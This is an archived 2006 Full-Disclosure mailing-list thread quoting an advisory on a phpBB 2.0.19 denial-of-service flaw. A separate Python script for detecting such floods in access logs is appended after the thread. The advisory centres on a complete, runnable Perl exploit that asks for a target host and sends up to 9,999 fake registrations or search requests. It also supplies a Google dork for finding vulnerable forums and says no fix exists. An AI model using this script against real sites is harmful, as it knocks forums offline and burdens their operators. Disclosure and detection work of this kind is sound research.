so what you're saying is that DoS exploits shouldn't be disclosed?<br><br>
<div><span class="gmail_quote">On 1/25/06, <b class="gmail_sendername">Edward Pearson</b> &lt;<a href="mailto:Ed@unityitservices.co.uk">Ed@unityitservices.co.uk</a>&gt; wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">
<div dir="ltr" align="left"><span><font face="Arial" color="#0000ff" size="2">The less said about DoS attacks the better. A tactic mostly employed by asexual teenagers who live in their parents' basement and call themselves &quot;h4x0rz&quot;.
</font></span></div>
<div dir="ltr" align="left"><span><font face="Arial" color="#0000ff" size="2">&nbsp;</font></span><span>&nbsp;</span></div>
<div dir="ltr" align="left">
<hr>
</div>
<div dir="ltr" align="left"><font face="Tahoma" size="2"><b>From:</b> <a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:full-disclosure-bounces@lists.grok.org.uk" target="_blank">full-disclosure-bounces@lists.grok.org.uk
</a> [mailto:<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:full-disclosure-bounces@lists.grok.org.uk" target="_blank">full-disclosure-bounces@lists.grok.org.uk</a>] <b>On Behalf Of </b>h4cky0u<br>
<b>Sent:</b> 25 January 2006 14:44<br><b>To:</b> <a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:full-disclosure@lists.grok.org.uk" target="_blank">full-disclosure@lists.grok.org.uk</a><br><b>Cc:</b>
 <a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:bugtraq@securityfocus.com" target="_blank">bugtraq@securityfocus.com</a><br><b>Subject:</b> [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php and profile.php
 DOS Vulnerability<br></font><br>&nbsp;</div>
<div><span class="e" id="q_1090212cf1bcc5b2_1">
<div></div><pre>------------------------------------------------------
      HYSA-2006-001 <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://h4cky0u.org/" target="_blank">h4cky0u.org</a> Advisory 010
------------------------------------------------------
Date - Wed Jan 25 2006


TITLE:
======

phpBB 2.0.19 search.php and profile.php DOS Vulnerability


SEVERITY:
=========

High


SOFTWARE:
=========

phpBB 2.0.19 and prior


INFO:
=====

phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.

Support Website : <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.phpbb.com/" target="_blank">http://www.phpbb.com</a>


BUG DESCRIPTION:
================

The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -

<a onclick="return top.js.OpenExtLink(window,event,this)" href="http://h4cky0u.org/viewtopic.php?t=637" target="_blank">http://h4cky0u.org/viewtopic.php?t=637</a>

This one affected only versions up till phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-

profile.php &lt;&lt; By registering as many users as you can.
search.php  &lt;&lt; By searching in a way that the db cannot understand.


Proof Of Concept Code:
======================

#!/usr/bin/perl
#######################################
##   Recoded by: mix2mix and Elioni of <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://ahg-khf.org/" target="_blank">http://ahg-khf.org</a>
##   And h4cky0u Security Forums (<a onclick="return top.js.OpenExtLink(window,event,this)" href="http://h4cky0u.org/" target="_blank">http://h4cky0u.org</a>)
##   Name: phpBBDoSReloaded
##   Original Author: HaCkZaTaN of Neo Security Team
##   Tested on phpBB 2.0.19 and earlier versions
##   Ported to perl by g30rg3_x
##   Date: 25/01/06
#######################################
use IO::Socket;

## Initialize X (loop counter, also used to number the accounts/searches)
$x = 0;

print q(
  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
  Recoded by Albanian Hackers Group &amp;
  h4cky0u Security Forums

);
print q(Host |without-&gt; http://www.| );
$host = &lt;STDIN&gt;;
chop ($host);

print q(Path |example-&gt; /phpBB2/ or /| );
$pth = &lt;STDIN&gt;;
chop ($pth);

print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
$type = &lt;STDIN&gt;;
chop ($type);

## Flood type 1: registration
if($type == 1){

## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{

## Member that gets registered automatically, numbered "X"
$uname = "username=AHG__" . "$x";

## E-mail address that gets stored in the database, numbered "X"
$umail = "&amp;email=AHG__" . "$x";

$postit = "$uname"."$umail"."%40ahg-crew.org&amp;new_password=0123456&amp;password_confirm=0123456&amp;icq=&amp;aim=N%2FA&amp;msn=&amp;yim=&amp;website=&amp;location=&amp;occupation=&amp;interests=&amp;signature=&amp;viewemail=0&amp;hideonline=0&amp;notifyreply=0&amp;notifypm=1&amp;popup_pm=1&amp;attachsig=1&amp;allowbbcode=1&amp;allowhtml=0&amp;allowsmilies=1&amp;language=english&amp;style=2&amp;timezone=0&amp;dateformat=D+M+d%2C+Y+g%3Ai+a&amp;mode=register&amp;agreed=true&amp;coppa=0&amp;submit=Submit";

$lrg = length $postit;

my $sock = new IO::Socket::INET (
                                 PeerAddr =&gt; "$host",
                                 PeerPort =&gt; "80",
                                 Proto =&gt; "tcp",
                                );
die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock;

## Send through the socket the HTTP request that registers a user on the phpBB forum
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "+" for every loop
syswrite STDOUT, "+";

$x++;
}

}
elsif ($type == 2){
## Flood type 2: search flood

while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&amp;search_terms=any&amp;search_author=&amp;search_forum=-1&amp;search_time=0&amp;search_fields=msgonly&amp;search_cat=-1&amp;sort_by=0&amp;sort_dir=ASC&amp;show_results=posts&amp;return_chars=200";

## POST body length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
                                 PeerAddr =&gt; "$host",
                                 PeerPort =&gt; "80",
                                 Proto =&gt; "tcp",
                                );
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;

## Send through the socket the HTTP request that submits a DB search to the phpBB forum
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "+" for every loop
syswrite STDOUT, "+";

## Increment X by one for every loop
$x++;
}
}else{
## WTF??? What did you type
   die "Mundësia nuk Lejohet +_-???\n";
}


FIX:
====

No fix available as of date.


GOOGLEDORK:
===========

"Powered by phpBB"


CREDITS:
========

- This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam.



- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script -

Web : <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://ahg-khf.org/" target="_blank">http://ahg-khf.org</a>

mail : webmaster at ahg-khf dot org


- Co Researcher -

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail dot com

web : <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.h4cky0u.org/" target="_blank">http://www.h4cky0u.org</a>


ORIGINAL ADVISORY:
==================

<a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt" target="_blank">http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt</a>

</pre>
-- <br><a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.h4cky0u.org/" target="_blank">http://www.h4cky0u.org</a><br>(In)Security at its best... </span></div><br>_______________________________________________
<br>Full-Disclosure - We believe in it.<br>Charter: <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://lists.grok.org.uk/full-disclosure-charter.html" target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>Hosted and sponsored by Secunia - <a onclick="return top.js.OpenExtLink(window,event,this)" href="http://secunia.com/" target="_blank">http://secunia.com/</a><br><br></blockquote></div><br><br clear="all"><br>-- <br>
smile tomorrow will be worse
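From the defender's side, both request patterns the quoted advisory describes (a stream of registration POSTs to profile.php, and a stream of POSTs to search.php) show up in the web server's access log as a burst from a single client. The script below is an added example, not part of the advisory or this thread: it parses Apache combined-format log lines (a constructed sample; the client IPs and forum path are assumed), counts POSTs per client to those two scripts over a sliding window, and reports clients that exceed a threshold.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Request part of an Apache/nginx "combined" access-log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# The two phpBB 2.0.x scripts the advisory names; both floods are POST requests.
FLOOD_SCRIPTS = ("/profile.php", "/search.php")

def flood_sources(log_lines, window_s=60, threshold=30):
    """Return {ip: {path: peak}} for clients that POST to profile.php or search.php
    more than `threshold` times inside any sliding window of `window_s` seconds."""
    recent = defaultdict(deque)                      # (ip, path) -> timestamps
    peaks = defaultdict(lambda: defaultdict(int))
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]            # drop ?mode=results etc.
        if not path.endswith(FLOOD_SCRIPTS):
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        q = recent[(m["ip"], path)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # expire old entries
            q.popleft()
        if len(q) > threshold:
            peaks[m["ip"]][path] = max(peaks[m["ip"]][path], len(q))
    return {ip: dict(p) for ip, p in peaks.items()}

def constructed_log():
    """Constructed sample: one client re-registering users and then searching in a
    tight loop, as the advisory's script does, plus one ordinary visitor."""
    def entry(ip, mm, ss, req):
        return (f'{ip} - - [25/Jan/2006:14:{mm:02d}:{ss:02d} +0000] '
                f'"{req} HTTP/1.1" 200 4123 "-" "Mozilla/5.0"')
    lines = [entry("198.51.100.7", 44, s, "POST /phpBB2/profile.php") for s in range(45)]
    lines += [entry("198.51.100.7", 45, s, "POST /phpBB2/search.php?mode=results")
              for s in range(35)]
    lines += [entry("203.0.113.9", 44, 10, "GET /phpBB2/viewtopic.php?t=12"),
              entry("203.0.113.9", 44, 50, "POST /phpBB2/search.php?mode=results"),
              entry("203.0.113.9", 45, 5, "POST /phpBB2/posting.php")]
    return sorted(lines, key=lambda l: l.split("[")[1][:26])   # chronological

if __name__ == "__main__":
    print(flood_sources(constructed_log()))   # flags only 198.51.100.7
```

The threshold is a tuning knob: a handful of registrations or searches per minute from one address is normal forum use, while dozens in a row to either script is the pattern worth alerting on or rate-limiting at the web server.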